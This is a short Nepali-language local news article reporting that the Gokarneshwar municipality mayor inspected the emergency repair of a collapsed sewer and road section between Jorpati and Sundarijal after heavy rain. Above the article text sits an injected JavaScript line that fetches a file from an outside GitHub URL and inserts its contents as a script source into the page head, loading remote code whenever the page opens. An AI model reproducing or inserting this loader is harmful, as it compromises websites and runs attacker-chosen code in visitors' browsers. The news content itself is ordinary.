;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ ।
केही समय अगाडि आएको भारी वर्षका कारण फुटेको ढलको मर्मत मर्मत स्थलमा गोकर्णेश्वर नगरपालिका का मेयर दिपक रिसालले अनुगमन गर्नु भएको छ।
जोरपाटी देखि सुन्दरीजल जाने बाटो छेउमा ढलको क्षमताले नभ्याएर बीच सडक भासिएको थियो। भासिएको ढल सहितको सडक नगरपालिकाले इन्जिनियर राखेर तत्काल मर्मत सुचारु गरेको छ।
गोकर्णेश्वर नगरपालिका वडा नं ६ मा पर्ने उक्त ठाउँको प्रत्यक्ष निगरानीमा वडा अध्यक्ष नवराज लामाले गरेका छन्। राती सम्म बसेर मर्मत कार्य निगरानी गरेको वडा अध्यक्ष लामाको भनाइ छ।
साथै रिसालले मर्मत गर्ने क्रममा यात्रुहरुलाई परेको असहज प्रति क्षमा समेत मागेका छन्
फेसबुक प्रतिक्रियाहरु